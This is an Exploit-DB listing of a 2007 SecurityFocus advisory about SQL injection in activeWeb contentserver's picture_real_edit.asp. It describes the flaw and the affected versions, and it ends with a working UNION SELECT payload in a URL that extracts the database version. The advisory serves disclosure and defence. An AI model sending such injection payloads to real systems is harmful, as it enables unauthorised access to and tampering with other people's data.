ActiveWeb Contentserver 5.6.2929 - 'Picture_Real_Edit.asp' SQL Injection

EDB-ID:

30296




Platform:

ASP

Date:

2007-07-13


source: https://www.securityfocus.com/bid/24894/info

activeWeb contentserver is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Reports indicate that contentserver versions prior to 5.6.2964 are vulnerable to this issue. 

https://www.example.com/admin/picture/picture_real_edit.asp?id='%20union%20select%20@@version%20,@@microsoftversion,@@version--